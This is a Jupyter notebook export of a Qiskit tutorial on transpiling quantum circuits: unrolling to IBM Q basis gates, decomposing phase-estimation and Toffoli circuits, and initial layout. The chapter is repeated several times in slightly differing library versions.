We see that the our device supports five native gates: three single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we can not read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set.The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form$$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes" and take zero time, and have no associated error; they are free gates on hardware.Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward, and is a placeholder gate with a fixed time-interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`) that, in the computational basis, can be written as:$$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix}$$,where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on a IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cu1(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, all of which are not in our devices basis gate set, and must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-U1 with lambda=pi/4
qc_basis.u1(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
A few things to highlight. One, the circuit has gotten longer with respect to the initial one. This can be verified by checking the depth of the circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates with more than two qubits, where multiple CNOT gates are needed to implement the entangling across the multiple qubits. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(np.pi/4, qr[1])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.u1(np.pi/4, qr[0])
qc_basis.u1(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates, and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and with therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
###Output
_____no_output_____
###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below.  Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
We see that the our device supports five native gates: three single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we can not read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set.The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form$$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes" and take zero time, and have no associated error; they are free gates on hardware.Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward, and is a placeholder gate with a fixed time-interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`) that, in the computational basis, can be written as:$$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix}$$,where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on a IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cp(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw()
###Output
_____no_output_____
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, all of which are not in our devices basis gate set, and must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-phase with lambda=pi/4
qc_basis.p(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.p(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.p(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw()
###Output
/usr/local/anaconda3/lib/python3.7/site-packages/ipykernel_launcher.py:6: DeprecationWarning: The QuantumCircuit.u2 method is deprecated as of 0.16.0. It will be removed no earlier than 3 months after the release date. You can use the general 1-qubit gate QuantumCircuit.u instead: u2(φ,λ) = u(π/2, φ, λ). Alternatively, you can decompose it interms of QuantumCircuit.p and QuantumCircuit.sx: u2(φ,λ) = p(π/2+φ) sx p(λ-π/2) (1 pulse on hardware).
/usr/local/anaconda3/lib/python3.7/site-packages/ipykernel_launcher.py:8: DeprecationWarning: The QuantumCircuit.u3 method is deprecated as of 0.16.0. It will be removed no earlier than 3 months after the release date. You should use QuantumCircuit.u instead, which acts identically. Alternatively, you can decompose u3 in terms of QuantumCircuit.p and QuantumCircuit.sx: u3(ϴ,φ,λ) = p(φ+π) sx p(ϴ+π) sx p(λ) (2 pulses on hardware).
###Markdown
A few things to highlight. One, the circuit has gotten longer with respect to the initial one. This can be verified by checking the depth of the circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates with more than two qubits, where multiple CNOT gates are needed to implement the entangling across the multiple qubits. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.p(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.p(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.p(np.pi/4, qr[1])
qc_basis.p(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.p(np.pi/4, qr[2])
qc_basis.p(np.pi/4, qr[0])
qc_basis.p(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw()
###Output
_____no_output_____
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates, and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and with therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
import qiskit.tools.jupyter
%qiskit_version_table
###Output
_____no_output_____
###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below.  Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
We see that the our device supports five native gates: three single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we can not read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set.The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form$$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes" and take zero time, and have no associated error; they are free gates on hardware.Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward, and is a placeholder gate with a fixed time-interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`) that, in the computational basis, can be written as:$$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix}$$,where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on a IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cu1(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, all of which are not in our devices basis gate set, and must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-U1 with lambda=pi/4
qc_basis.u1(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
A few things to highlight. One, the circuit has gotten longer with respect to the initial one. This can be verified by checking the depth of the circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates with more than two qubits, where multiple CNOT gates are needed to implement the entangling across the multiple qubits. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(np.pi/4, qr[1])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.u1(np.pi/4, qr[0])
qc_basis.u1(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates, and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and with therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
###Output
_____no_output_____
###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below.  Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
We see that the our device supports five native gates: three single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we can not read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set.The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form$$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes" and take zero time, and have no associated error; they are free gates on hardware.Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward, and is a placeholder gate with a fixed time-interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`) that, in the computational basis, can be written as:$$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix}$$,where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on a IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cu1(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, all of which are not in our devices basis gate set, and must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-U1 with lambda=pi/4
qc_basis.u1(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
A few things to highlight. One, the circuit has gotten longer with respect to the initial one. This can be verified by checking the depth of the circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates with more than two qubits, where multiple CNOT gates are needed to implement the entangling across the multiple qubits. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(np.pi/4, qr[1])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.u1(np.pi/4, qr[0])
qc_basis.u1(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates, and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and with therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
import qiskit
qiskit.__qiskit_version__
###Output
_____no_output_____
###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below.  Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
